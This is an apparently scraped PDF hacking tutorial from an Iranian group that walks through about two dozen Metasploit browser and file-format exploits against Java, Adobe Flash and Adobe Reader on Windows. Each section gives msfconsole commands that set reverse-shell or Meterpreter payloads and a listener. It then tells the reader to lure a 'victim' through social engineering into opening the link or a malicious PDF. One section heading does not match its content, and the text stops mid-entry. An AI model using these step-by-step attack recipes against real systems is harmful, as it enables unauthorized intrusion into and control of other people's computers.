Вы находитесь на странице: 1из 56

Back Track Tutorials

How to Attack on Remote PC With Applications Vulnerabilities

By : Red H4t V!per


All Right Reserved For IrIsT Security Team
[Type text] Page 1

IriIriISIrIsT.Ir

Page 1

Contact : RedH4t.Viper@yahoo.com RedH4t.Viper@gmail.com

Copy Right : All Right Reserved For IrIsT Security Team - Behnam Abbasi Vanda Spacial Tnx To : Am!r , C0dex , B3HZ4D , TaK.FaNaR , 0x0ptim0us , Mr.XHat Skote_Vahshat , (^_^) Gr33TZ To : IrIsT , TBH , 3xp1r3 , KurdHackTeam
[Type text] Page 2

IriIriISIrIsT.Ir

Page 1

Introduction : In this paper an attempt is made on how to exploiting vulnerabilities and geting access from remote pc with metasploit on back track . Its is assumed that you're familiar enough with the Linux operating system and the metasploit software . So we go straight to Attack Topic. Thanks all Dears for reading this article

[Type text]

Page 3

IriIriISIrIsT.Ir

Page 1

Attacting on Remote Windows PC using java Signed Applet Methodacked :


This exploit dynamically creates a .jar file via the Msf:: Exploit::Java mixin, then signs the it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victims JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the Publisher line. Newer JVMs display UNKNOWN when the signature is not trusted (i.e., its not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated selfsigned cert will be used. Either way, once the user clicks run, the applet executes with full user permissions.
Open backtrack terminal type msfconsole then type below command: use exploit/multi/browser/java_signed_applet Now type Show options :

Msf exploit (Java_signed-applet)>Set payload windows/meterpreter/reverse_tcp Msf exploit (Java_signed-applet)>Set appletname adobe (The main applets class name) Msf exploit (Java_signed-applet)>Set certcn adobe player (value for the certificate) Msf exploit (Java_signed-applet)>Set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (Java_signed-applet)>Set srvport 80 (The local port to listen on default: 8080) Msf exploit (Java_signed-applet)>Set uripath adobeclipes (The Url to use for this exploit) Msf exploit (Java_signed-applet)>Set lport 4443 Msf exploit (Java_signed-applet)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 / adobeclipes Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session
[Type text] Page 4

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Sun Java Command Line Injection : This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV MiniRedirector) enabled
Open backtrack terminal type msfconsole then type below command:

use exploit/windows/browser/java_ws_vmargs

Msf exploit (java_ws_vmargs)>set payload windows/meterpreter/reverse_tcp Msf exploit (java_ws_vmargs)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_ws_vmargs)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_ws_vmargs)>set srvport 80 Msf exploit (java_ws_vmargs)>set uripath / (The Url to use for this exploit) Msf exploit (java_ws_vmargs)>exploit

Now an URL you should give to your victim http:// 192.168.42.131/ Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 5

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Java Atomic Reference Array Type Violation Vulnerability :

This module exploits vulnerability due to the fact that AtomicReferenceArray uses the unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.
Open backtrack terminal type msfconsole then type below command:

use exploit/windows/browser/java_atomicreferencearray

Msf exploit (java_atomicreferencearray)>set payload generic/shell_reverse_tcp Msf exploit (java_atomicreferencearray)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_atomicreferencearray)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_atomicreferencearray)>set uripath yes (The Url to use for this exploit) Msf exploit (java_atomicreferencearray)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ yes Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 6

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using java Trusted Chain Method : This module exploits vulnerability in Java Runtime Environment that allows an untrusted method to run in a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/java_trusted_chain

Msf exploit (java_trusted_chain)>set payload java/meterpreter/reverse_tcp Msf exploit (java_trusted_chain)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_trusted_chain)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_trusted_chain)>set uripath jta (The Url to use for this exploit) Msf exploit (java_trusted_chain)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jta Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 7

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Java RMIConnectionImpl Deserialization Privilege Escalation Exploit : This module exploits vulnerability in the Java Runtime Environment that allows to deserialize a Marshalled Object containing a custom class loader under a privileged context. The vulnerability affects version 6 prior to update 19 and version 5 prior to update 23.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/java_rmi_connection_impl

Msf exploit (java_rmi_connection_impl)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_rmi_connection_impl)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_rmi_connection_impl)>set uripath bip (The Url to use for this exploit) Msf exploit (java_rmi_connection_impl)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/bip Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 8

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Sun Java Runtime Buffer Overflow : This module exploits a flaw in the new plugin component of the Sun Java Runtime Environment before v6 Update 22. By specifying specific parameters to the new plugin, an attacker can cause a stack-based buffer overflow and execute arbitrary code. When the new plugin is invoked with a launchjnlp parameter, it will copy the contents of the docbase parameter to a stack-buffer using the sprintf function. A string of 396 bytes is enough to overflow the 256 byte stack buffer and overwrite some local variables as well as the saved return address. NOTE: The string being copied is first passed through the WideCharToMultiByte. Due to this, only characters which have a valid localized multibyte representation are allowed. Invalid characters will be replaced with question marks (?).
Open backtrack terminal type msfconsole then type below command:

use exploit/windows/browser/java_docbase_bof

Msf exploit (java_docbase_bof)>set payload windows/meterpreter/reverse_tcp Msf exploit (java_docbase_bof)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_docbase_bof)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_docbase_bof)>set uripath jab (The Url to use for this exploit) Msf exploit (java_docbase_bof)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jab Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session
[Type text] Page 9

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Sun Java Applet2ClassLoader Remote Code Execution :: This module exploits vulnerability in the Java Runtime Environment that allows an attacker to run an applet outside of the Java Sandbox. When an applet is invoked with: 1. A codebase parameter that points at a trusted directory 2. A code parameter that is a URL that does not contain any dots the applet will run outside of the sandbox. This vulnerability affects JRE prior to version 6 update 24.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/java_codebase_trust

Msf exploit (java_codebase_trust)>set payload java/meterpreter/reverse_tcp Msf exploit (java_codebase_trust)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_codebase_trust)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_codebase_trust)>set uripath jt (The Url to use for this exploit) Msf exploit (java_codebase_trust)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jt Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 10

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Sun Java Web start Execution: This module exploits vulnerability in Java Runtime Environment that allows an attacker to escape the Java Sandbox. By injecting a parameter into a javas call within the Basic Service Impl class the default java sandbox policy file can be therefore overwritten. The vulnerability affects version 6 prior to update 22. NOTE: Exploiting this vulnerability causes several sinister-looking popup windows saying that Java is Downloading application.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/java_basicservice_impl

Msf exploit ((java_basicservice_impl)>set payload windows/meterpreter/reverse_tcp Msf exploit (java_basicservice_impl) set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_basicservice_impl)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_basicservice_impl)>set uripath jbs (The Url to use for this exploit) Msf exploit (java_basicservice_impl)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jbs Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 11

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using java Applet Rhino Script : This module exploits vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc)
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/java_rhino

Msf exploit (java_rhino)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_rhino)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_rhino)>set target 1 (Opreating system of Victim PC) Msf exploit (java_rhino)>set uripath jr (The Url to use for this exploit) Msf exploit (java_rhino)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jr Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 12

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Java MixerSequencer Object GM_Song Structure Handling Vulnerability : This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation id done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer objects is used to play the file, the GM Song structure is populated with a function pointer provided by a SONG block in the RMF. A Midi block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability ebx points to a fake event in the MIDI file which stores the shell code. A jmp ebx from msvcr71.dll is used to make the exploit reliable over java updates.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/java_mixer_sequencer

Msf exploit (java_mixer_sequencer)>set payload windows/meterpreter/reverse_tcp Msf exploit (java_mixer_sequencer) set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_mixer_sequencer)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_mixer_sequencer)>set uripath jm (The Url to use for this exploit) Msf exploit (java_mixer_sequencer)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jm Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 13

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Sun Java Calendar Deserialization Privilege Escalation : This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/java_calendar_deserialize

Msf exploit (java_calendar_deserialize)>set payload java/meterpreter/reverse_tcp Msf exploit (java_calendar_deserialize)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_calendar_deserialize)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_calendar_deserialize)>set uripath jc (The Url to use for this exploit) Msf exploit (java_calendar_deserialize)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jc Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 14

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Sun Java JRE get Sound bank file :
This module exploits a flaw in the getSoundbank function in the Sun JVM. The payload is serialized and

passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
Open backtrack terminal type msfconsole then type below command: use exploit/multi/browser/java_getsoundbank_bof

Msf exploit (java_getsoundbank_bof)>set payload generic/shell_reverse_tcp Msf exploit (java_getsoundbank_bof)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_getsoundbank_bof)>set uripath js (The Url to use for this exploit) Msf exploit (java_getsoundbank_bof)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/jc Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 15

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Sun Java JRE AWT setDiffICM Buffer Overflow : This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/java_setdifficm_bof

Msf exploit (java_setdifficm_bof)>set payload generic/shell_reverse_tcp Msf exploit (java_setdifficm_bof)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_setdifficm_bof)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_setdifficm_bof)>set uripath rb (The Url to use for this exploit) Msf exploit (java_setdifficm_bof)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/rb Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 16

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Sun Java Web Start Plugin Command Line Argument Injection : This module exploits a flaw in the Web Start Plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 are believed to be affected by this vulnerability. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/java_ws_arginject_altjvm

Msf exploit (java_ws_arginject_altjvm)>set payload windows/meterpreter/reverse_tcp Msf exploit (java_ws_arginject_altjvm)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_ws_arginject_altjvm)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_ws_arginject_altjvm)>exploit

Now an URL you should give to your victim http:// 192.168.42.131/ Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 17

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC usingJava Applet JAX-WS Remote Code Execution : This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.
Open backtrack terminal type msfconsole then type below command: use exploit/multi/browser/java_jre17_jaxws

msf exploit (java_jre17_jaxws)>set payload java/shell_reverse_tcp msf exploit (java_jre17_jaxws)>set lhost 192.168.42.131 (IP of Local Host) msf exploit (java_jre17_jaxws)>set srvhost 192.168.42.131 (This must be an address on the local machine) msf exploit (java_jre17_jaxws)>set uripath / (The Url to use for this exploit) msf exploit (java_jre17_jaxws)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 18

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Java 7 Applet Remote Code Execution : The exploit takes advantage of two issues in JDK 7: The Class Finder and Method Finder.find Method(). Both were newly introduced in JDK 7. Class Finder is a replacement for class For Name back in JDK 6. It allows untrusted code to obtain a reference and have access to a restricted package in JDK 7, which can be used to abuse sun.awt. Sun Toolkit (a restricted package). With sun.awt. Sun Toolkit, we can actually invoke get Field() by abusing find Method() in Statement.invokeInternal() (but get Field() must be public, and thats not always the case in JDK 6) in order to access Statement.accs private field, modify Access Control Context, and then disable Security Manager. Once Security Manager is disabled, we can execute arbitrary Java code. Our exploit has been tested successfully against multiple platforms, including: IE, Firefox, Safari, Chrome; Windows, Ubuntu, OS X, Solaris, etc.
Open backtrack terminal type msfconsole then type below command: use exploit/multi/browser/java_jre17_exec

msf exploit (java_jre17_exec)>set payload java/shell_reverse_tcp msf exploit (java_jre17_exec)>set lhost 192.168.42.131 (IP of Local Host) msf exploit (java_jre17_exec)>set srvhost 192.168.42.131 (This must be an address on the local machine) msf exploit (java_jre17_exec)>set uripath / (The Url to use for this exploit) msf exploit (java_jre17_exec)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session
[Type text] Page 19

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Java Applet Field Bytecode Verifier Cache Remote Code Execution : This module exploits vulnerability in HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations
Open backtrack terminal type msfconsole then type below command: use exploit/multi/windows/browser/java_verifier_field_access

Msf exploit (java_verifier_field_access)>set payload java/shell_reverse_tcp Msf exploit (java_verifier_field_access)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (java_verifier_field_access)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (java_verifier_field_access)>set uripath / (The Url to use for this exploit) Msf exploit (java_verifier_field_access)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 20

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Java Applet Field Bytecode Verifier Cache Remote Code Execution : This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/adobe_flash_otf_font

msf exploit (adobe_flash_otf_font)>set lhost 192.168.42.131 (IP of Local Host) msf exploit (adobe_flash_otf_font)>set srvhost 192.168.42.131 (This must be an address on the local machine) msf exploit (adobe_flash_otf_font)>set uripath flu (The Url to use for this exploit) msf exploit (adobe_flash_otf_font)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/flu Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 21

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Adobe Flash Player 11.3 Font Parsing Code Execution : This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/adobe_flash_otf_font

msf exploit (adobe_flash_otf_font)>set payload windows/meterpreter/reverse_tcp msf exploit (adobe_flash_otf_font)>set lhost 192.168.42.131 (IP of Local Host) msf exploit (adobe_flash_otf_font)>set srvhost 192.168.42.131 (This must be an address on the local machine) msf exploit (adobe_flash_otf_font)>set uripath fpu (The Url to use for this exploit) msf exploit (adobe_flash_otf_font)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/fpu Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 22

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Adobe Flash Player Object Type Confusion : This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 _error response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the World Uyghur Congress Invitation.doc e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/adobe_flash_rtmp

Msf exploit (adobe_flash_rtmp)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_flash_rtmp)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (adobe_flash_rtmp)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (adobe_flash_rtmp)>set uripath / (The Url to use for this exploit) Msf exploit (adobe_flash_rtmp)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 23

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Adobe util.printf() Buffer Overflow

This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/adobe_utilprintf

Msf exploit (adobe_utilprintf)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_utilprintf)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (adobe_utilprintf)>set filename book.pdf Msf exploit (adobe_utilprintf)>exploit

After we successfully generate the malicious PDF File, it will stored on your local computer /root/.msf4/local/book.pdf Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.42.131 exploit

Now send your book.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer. Use Sessions -l and the Session number to connect to the session.

[Type text]

Page 24

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Adobe Doc.media.newPlayer Use After Free Vulnerability : This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/adobe_media_newplayer

Msf exploit (adobe_media_newplayer)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_media_newplayer)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (adobe_media_newplayer)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (adobe_media_newplayer)>set uripath ad (The Url to use for this exploit) Msf exploit (adobe_media_newplayer)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/ad Send the link of the server to the victim via any social engineering technique. When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

[Type text]

Page 25

IriIriISIrIsT.Ir

Page 1

Attacting On Remote Windows PC using Adobe Reader U3D Memory Corruption Vulnerability : This module exploits vulnerability in the U3D handling within versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader. The vulnerability is due to the use of uninitialized memory. Arbitrary code execution is achieved by embedding specially crafted U3D data into a PDF document. A heap spray via JavaScript is used in order to ensure that the memory used by the invalid pointer issue is controlled.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/adobe_reader_u3d

Msf exploit (adobe_reader_u3d)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_reader_u3d)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (adobe_reader_u3d)>set filename learning.pdf Msf exploit (adobe_reader_u3d)>exploit

After we successfully generate the malicious PDF File, it will stored on your local computer /root/.msf4/local/learning.pdf Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.42.131 exploit

[Type text]

Page 26

IriIriISIrIsT.Ir

Page 1

Now send your learning.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer. Use Sessions -l and the Session number to connect to the session.

Attacting On Remote Windows PC using Adobe PDF Escape EXE Social Engineering: This module embeds a Metasploit payload into an existing PDF file in a nonstandard method. The resulting PDF can be sent to a target as part of a social engineering attack.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename parse.pdf Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit

After we successfully generate the malicious PDF File, it will stored on your local computer /root/.msf4/local/parse.pdf Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.42.131 exploit

[Type text]

Page 27

IriIriISIrIsT.Ir

Page 1

Now send your parse.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer. Use Sessions -l and the Session number to connect to the session

Attacting On Remote Windows PC Using Adobe Acrobat Bundled LibTIFF Integer Overflow : This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/adobe_libtiff

Msf exploit (adobe_libtiff)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_libtiff)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_libtiff)>set filename ebook.pdf

Msf exploit (adobe_libtiff)>exploit

After we successfully generate the malicious PDF File, it will stored on your local computer /root/.msf4/local/ebook.pdf Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

[Type text]

Page 28

IriIriISIrIsT.Ir

Page 1

Use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.42.131 exploit Now send your ebook.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer. Use Sessions -l and the Session number to connect to the session

Attacting On Remote Windows PC Using Adobe Collab.collect Email Info() Buffer Overflow : This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo () call, an attacker may be able to execute arbitrary code
Open backtrack terminal type msfconsole then type below command: use exploit/windows/fileformat/adobe_collectemailinfo

Msf exploit (adobe_collectemailinfo)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_collectemailinfo)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (adobe_collectemailinfo)>set filename math.pdf Msf exploit (adobe_collectemailinfo)>exploit

After we successfully generate the malicious PDF File, it will stored on your local computer /root/.msf4/local/math.pdf Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
[Type text] Page 29

IriIriISIrIsT.Ir

Page 1

Use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.42.131 exploit Now send your math.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer. Use Sessions -l and the Session number to connect to the session

Attacting On Remote Windows PC Using Adobe CoolType SING Table uniqueName Stack Buffer Overflow : This module exploits vulnerability in the Smart Independent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version is assumed to be vulnerable as well.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/adobe_cooltype_sing

Msf exploit (adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_cooltype_sing)>set lhost 192.168.42.131 (IP of Local Host) Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.42.131 (This must be an address on the local machine) Msf exploit (adobe_cooltype_sing)>set uripath fr (The Url to use for this exploit) Msf exploit (adobe_cooltype_sing)>exploit

Now an URL you should give to your victim http:// 192.168.42.131 :8080/fr Send the link of the server to the victim via any social engineering technique.
[Type text] Page 30

IriIriISIrIsT.Ir

Page 1

When the victim open that link in their browser You get access to the victims PC. Use Sessions -l and the Session number to connect to the session

Attacting On Remote Windows PC Using Adobe JBIG2Decode Heap Corruption Exploit:


This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Open backtrack terminal type msfconsole then type below command: use exploit/windows/browser/adobe_jbig2decode

